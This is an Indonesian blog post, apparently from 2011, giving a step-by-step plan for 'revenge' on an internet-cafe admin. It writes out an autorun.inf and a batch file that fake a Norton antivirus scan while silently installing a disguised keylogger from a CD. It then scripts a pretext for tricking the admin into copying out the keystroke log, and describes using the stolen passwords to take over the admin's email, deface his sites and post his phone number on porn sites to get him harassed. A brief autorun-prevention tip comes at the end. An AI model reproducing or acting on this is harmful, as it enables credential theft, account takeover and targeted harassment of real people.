76cellular: Pembalasan untuk penjaga warnet
counter76cellular jl.veteran no.76 lamongan jawatimur, GOD Bless You!

Senin, 07 Maret 2011

Pembalasan untuk penjaga warnet

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie.

Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate patch sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi”rongsokan” tak berguna. Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.

Serangan pertama
Kita akan menjadi seorang “agen mata-mata” (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang… mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net. kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah - langkah berikut:

—[1 Bukalah Notepad kemudian ketik baris script berikut:

[autorun]
open=nav.bat

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].

—[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik

script berikut:
@echo off
echo Norton Antivirus 2010
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save].
—[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan.
—[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD. Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, “Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla.”
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis —> file autorun.inf

akan memproses file nav.bat —> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya —> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden. Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam

bentuk apapun! So, nggak usah khawatir bakal ketahuan ;) Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi – lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel. Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua.
Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan pada beliau,”Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya..” Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan. Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.
Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum’at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam. Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/ account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan mengirimkan password via email. So, setelah dapat semuanya… heheh… DEFACE ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah password apapun!! Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs – situs porno dan postinglah sebuah pesan singkat, memikat dan “mematikan”. Berikut contohnya jika milis tersebut berbahasa Indonesia:
Dear all..

gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin) gwe tunggu 24 jam lho!! Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata yang yahuud!! ;D Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa

maksudnya ;D
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari milis-milis tersebut, telepon rumahnya masih terus – terusan menjerit – jerit dengan jeritan indah :D
Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun..
1. Buka windows explorer

2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.

3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif. Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak

terduga di sekitar anda!!
Penutup

—[+ Kesimpulan

Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana

namun dampaknya.. bisa anda bayangkan sendiri ;) Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo dan hasilnya saya berhasil mendapatkan catatan aktivitas sang admin (password etc..). Tapi untuk penerapan “PEMBALASAN” tentu saya tidak melakukan hal sekejam itu ;P

Tidak ada komentar:

Posting Komentar

silahkan anda meninggalkan komentar dengan menjunjung tinggi nilai etika dan kesopanan.... terimakasih atas partisipasi dan kunjungan anda....
salam korsa,